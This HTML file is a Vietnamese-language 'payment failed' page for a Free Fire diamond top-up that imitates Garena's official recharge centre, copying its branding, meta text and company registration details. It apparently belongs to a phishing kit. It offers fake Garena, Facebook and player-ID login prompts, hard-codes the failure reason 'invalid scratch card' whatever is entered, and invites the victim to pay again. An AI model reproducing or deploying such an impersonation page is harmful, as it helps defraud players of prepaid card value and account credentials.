

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1 , maximum-scale=1, user-scalable=no, viewport-fit=cover">
<title>Thanh toán không thành công</title>
<meta http-equiv="content-language" content="vi">
<meta name="robots" content="index, follow'">
<link rel="shortcut icon" href="https://cdngarenanow-a.akamaihd.net/webmain/static/favicon.ico">
<link rel="shortcut icon" href="https://cdngarenanow-a.akamaihd.net/webmain/static/favicon.ico">
<link href="css/base.css" rel="stylesheet" />
<link rel="stylesheet" href="js/slick/slick.css">
<script type="text/javascript" src="js/jquery-3.3.1.js"></script>
<script type="text/javascript" src="js/slick/slick.js"></script>
<link href="css/style.css" rel="stylesheet" />
<meta key="description" name="description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">
<meta key="keywords" name="keywords" content="nạp tiền, garena, game, games" data-react-helmet="true">
<meta key="twitter:title" name="twitter:title" content="Trung tâm nạp thẻ Garena" data-react-helmet="true">
<meta key="twitter:description" name="twitter:description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">
<meta key="og:title" property="og:title" content="Trung tâm nạp thẻ Garena" data-react-helmet="true">
<meta key="og:type" property="og:type" content="website" data-react-helmet="true">
<meta key="og:image" property="og:image" content="https://cdngarenanow-a.akamaihd.net/webmain/static/payment_center/common/garena-logo.png" data-react-helmet="true">
<meta key="og:url" property="og:url" content="/" data-react-helmet="true">
<meta key="og:description" property="og:description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">
<script type="text/javascript" src="js/style.js"></script>
</head>
<body>
<div class="s-header-1">
<div class="container align-items--between">
<a href="/" class="hd-logo"><img src="images/logo.png" alt=""></a>
<div class="hd-menu">
<a href="javascript:;" ht-trigger="hd-menu"><span>☰</span><span>×</span></a>
</div>
<a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="hd-button"><img class="logged" src="images/user-2.png" alt=""> <span class="name">Đăng nhập</span></a>
</div>
</div>
<div id="modalLogin" class="c-modal" ht-close="c-modal">
<div class="c-modal-box">
<div class="c-modal-group" ht-skip="parent">
<div class="c_close text--white" ht-close="c-modal"><img src="images/close.png" alt=""></div>
<div class="c_body">
<div class="s-login-1">
<div class="s_title">Bảng điều khiển đăng nhập</div>
<div class="s_button">
<a href=""><img src="images/garena.png" alt=""> <span>Garena</span></a>
<a href=""><img src="images/facebook.png" alt=""> <span>Facebook</span></a>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="modalLogin2" class="c-modal" ht-close="c-modal">
<div class="c-modal-box">
<div class="c-modal-group" ht-skip="parent">
<div class="c_close text--white" ht-close="c-modal"><img src="images/close.png" alt=""></div>
<div class="c_body">
<div class="s-login-1">
<div class="s_title">Bảng điều khiển đăng nhập</div>
<div class="s_button">
<a href=""><img src="images/facebook.png" alt=""> <span>Facebook</span></a>
<div class="s_faifai">
<a href="login.html"><img src="images/iconfaifai.png" alt=""> <div><span>ID Người Chơi</span></div></a>
<span ht-trigger="c-modal-3" ht-target="#modalLogin3"><img src="images/question.png" alt=""></span>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="modalLogin3" class="c-modal c-modal-3" ht-close="c-modal-3">
<div class="c-modal-box">
<div class="c-modal-group" ht-skip="parent">
<div class="c_close text--white" ht-close="c-modal-3"><img src="images/close.png" alt=""></div>
<div class="c_body">
<img src="images/id.png" alt="">
</div>
</div>
</div>
</div>
<div class="s-menu-1">
<div class="s_menu">
<ul ht-target="hd-menu">
<li class="user"><img src="images/faifai.png" alt=""> <span id="name"></span></li>
<li><a href="">Chăm sóc khách hàng</a></li>
<li><a href="javascript:;" id="logout">Đăng xuất</a></li>
</ul>
</div>
<div class="s_after"></div>
</div>
<div class="s-success-1">
<div class="container">
<div class="s_img"><img src="images/error.png" alt=""> <span>Giao dịch thất bại</span></div>
<ul class="s_list_1">
<li><div>Sản phẩm được chọn</div> <div><img src="images/diamon.jpg" alt=""> <span id="diamond">40</span></div></li>
<li><div>Giá</div> <div><span id="money"></span> <span>&nbsp;VND</span></div></li>
</ul>
<ul class="s_list_2">
<li><div>Game</div><div>Free Fire</div></li>
<li><div>Phương thức thanh toán</div><div id="type"></div></li>
<li><div>Chi tiết</div><div id="date">Thẻ cào không hợp lệ</div></li>
<li><div>ID người chơi</div><div class="name"></div></li>
</ul>
<div class="s_button"><a href="recharge.html">Thanh toán lại</a></div>
</div>
</div>
<div class="s-foolter-1">
<div class="container">
<ul>
<li>CÔNG TY CỔ PHẦN PHÁT TRIỂN THỂ THAO ĐIỆN TỬ VIỆT NAM</li>
<li>Giấy CNĐKKD số 0103959912, cấp lần đầu ngày 09/06/2009 | Cơ quan cấp: Phòng Đăng ký kinh doanh- Sở Kế hoạch và đầu tư TP Hà Nội</li>
<li>Địa chỉ trụ sở chính: Tầng 29, Tòa nhà Trung tâm Lotte Hà Nội, số 54 đường Liễu Giai, Phường Cống Vị, Quận Ba Đình, TP Hà Nội, Việt Nam</li>
<li>Điện thoại: 024 73053939</li>
</ul>
<ul>
<li><a href="">Câu hỏi thường gặp</a></li> 
<li><a href="">Điều khoản dịch vụ</a></li> 
<li><a href="">Chính sách bảo mật</a></li> 
</ul>
</div>
</div>
<style type="text/css">
        body{
            background-color: #fff;
        }
    </style>
<script type="text/javascript">
        $(document).ready(function() {
            var json = $.parseJSON(sessionStorage.getItem('item')),
                diamond = $.parseJSON(sessionStorage.getItem('diamond')),
                idGame = sessionStorage.getItem('idGame');

            if(!idGame) {
                window.location.href = '/';
            }
        var type = sessionStorage.getItem('type'),
            idGame = sessionStorage.getItem('idGame'),
            amount = sessionStorage.getItem('amount'),
            diamond = sessionStorage.getItem('diamond');
             $('#type').text(type ? type : 'Viettel');
        $('#diamond').text(diamond ? diamond : '45');
        $('#money').text(amount ? amount : '20000');
            // if(json) {
            //     $('#amount').text(json.amount + ' VND');
            //     $('#type').text(json.type);
            //     $('#date').text(json.time);
            //     $('#id').text(json.id);
            //     $('#diamond').text(diamond);
            // }
        });
    </script>
</body>
</html>